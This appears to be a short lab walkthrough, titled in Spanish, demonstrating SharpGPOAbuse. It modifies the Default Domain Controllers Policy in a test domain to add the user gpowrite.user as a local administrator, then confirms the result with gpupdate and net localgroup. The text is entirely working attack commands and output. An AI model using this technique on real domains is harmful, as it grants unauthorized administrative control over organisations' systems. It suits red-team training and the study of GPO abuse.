Utilizando SharpGPOAbuse

PS C:\> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount gpowrite.user --GPOName "Default Domain Controllers Policy"
[+] Domain = spartancybersec.corp
[+] Domain Controller = First-DC.spartancybersec.corp
[+] Distinguished Name = CN=Policies,CN=System,DC=spartancybersec,DC=corp
[+] SID Value of gpowrite.user = S-1-5-21-1861162130-2580302541-221646211-1121
[+] GUID of "Default Domain Controllers Policy" is: {6AC1786C-016F-11D2-945F-00C04fB984F9}
[+] File exists: \\spartancybersec.corp\SysVol\spartancybersec.corp\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

PS C:\> hostname
User-Server

C:\Users\admin>gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

C:\Users\admin>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
gpowrite.user
The command completed successfully.